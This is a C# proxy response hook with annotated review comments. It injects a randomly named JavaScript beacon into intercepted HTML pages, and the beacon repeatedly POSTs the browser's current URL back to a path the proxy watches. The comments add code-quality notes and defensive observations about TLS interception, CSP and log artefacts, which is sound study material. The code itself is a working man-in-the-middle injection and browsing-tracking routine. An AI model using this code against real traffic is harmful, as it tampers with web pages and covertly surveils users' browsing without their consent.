//Test script injection
//Insert script to read the Browser URL and send it back to proxy
/// <summary>
/// Response hook (presumably registered with the proxy as a response callback — confirm against the
/// caller) that rewrites eligible HTML responses in transit: it appends an inline script before the
/// last <c>&lt;/body&gt;</c> that POSTs the browser's top-level URL to a randomly named path on the
/// page's own host. Only responses that are GET/POST, HTTP 200, have a text/html content type and
/// carry no <c>X-Requested-With</c> header are touched. The random path is remembered in
/// <c>_URLList</c> so that a handler outside this method can recognise the beacon request.
/// </summary>
/// <param name="sender">Event source; unused here.</param>
/// <param name="e">Session data for the proxied request/response pair.</param>
/// <remarks>
/// Review notes: (1) <c>string c</c> is assigned but never read, and the same header is fetched
/// twice. (2) <c>ToLower()</c> is culture-sensitive; an ordinal, case-insensitive comparison is the
/// safer idiom for a content-type check. (3) The bare <c>catch { }</c> discards every exception,
/// so a failure after the body has been read but before it is written back is invisible.
/// From a defender's standpoint, the modification is only possible because the proxy can terminate
/// TLS for the client; a CSP that disallows inline scripts would refuse to execute the injected
/// block, and the repeated same-origin POSTs to a non-existent 25-character path are the
/// observable artefact in server logs.
/// </remarks>
public void OnResponse(object sender, SessionEventArgs e)
{
    try
    {
        if (e.ProxyRequest.Method == "GET" || e.ProxyRequest.Method == "POST")
        {
            if (e.ServerResponse.StatusCode == HttpStatusCode.OK)
            {
                // Culture-sensitive lowering; see remarks.
                if (e.ServerResponse.ContentType.Trim().ToLower().Contains("text/html"))
                {
                    // Unused local; the header is re-read on the next line.
                    string c = e.ServerResponse.GetResponseHeader("X-Requested-With");
                    // Skip responses flagged as XHR/AJAX so only full page documents are rewritten.
                    if (e.ServerResponse.GetResponseHeader("X-Requested-With") == "")
                    {
                        // Presumably loads the body so ResponseString below is populated — confirm with the proxy API.
                        e.GetResponseBody();
                        // Randomised identifiers so the injected script has no fixed names.
                        string functioname = "fr" + RandomString(10);
                        string VisitedURL = RandomString(5);
                        string RequestVariable = "c" + RandomString(5);
                        string RandomURLEnding = RandomString(25);
                        string RandomLastRequest = RandomString(10);
                        string LocalRequest;
                        // Beacon target lives on the same host/scheme as the page, so it is a same-origin request.
                        if (e.IsSecure) LocalRequest = "https://" + e.Hostname + "/" + RandomURLEnding;
                        else LocalRequest = "http://" + e.Hostname + "/" + RandomURLEnding;
                        // Client-side script: runs only in the top frame, polls every 500 ms, and POSTs
                        // window.top.location.href (falling back to document.referrer) whenever it changes.
                        string script = "var " + RandomLastRequest + " = null;"
                            + "if(window.top==self) { " + "\n"
                            + " " + functioname + "();"
                            + "setInterval(" + functioname + ",500); " + "\n"
                            + "}"
                            + "function " + functioname + "(){ " + "\n"
                            + "var " + RequestVariable + " = new XMLHttpRequest(); " + "\n"
                            + "var " + VisitedURL + " = null;" + "\n"
                            + "if(window.top.location.href!=null) " + "\n"
                            + "" + VisitedURL + " = window.top.location.href; else " + "\n"
                            + "" + VisitedURL + " = document.referrer; "
                            + "if(" + RandomLastRequest + "!= " + VisitedURL + ") {"
                            + RequestVariable + ".open(\"POST\",\"" + LocalRequest + "\", true); " + "\n"
                            + RequestVariable + ".send(" + VisitedURL + ");} "
                            + RandomLastRequest + " = " + VisitedURL + "}";
                        string response = e.ResponseString;
                        // RightToLeft + count 1: only the last </body> in the document is replaced.
                        Regex RE = new Regex("</body>", RegexOptions.RightToLeft | RegexOptions.IgnoreCase | RegexOptions.Multiline);
                        string replaced = RE.Replace(response, "<script type =\"text/javascript\">" + script + "</script></body>", 1);
                        // Length change is the only signal that a </body> was actually found and replaced.
                        if (replaced.Length != response.Length)
                        {
                            e.ResponseString = replaced;
                            // Remember the random path; a separate request handler (not in this view) presumably matches on it.
                            _URLList.Add(RandomURLEnding);
                        }
                    }
                }
            }
        }
    }
    // Swallows every exception, including partial-modification failures; see remarks.
    catch { }
}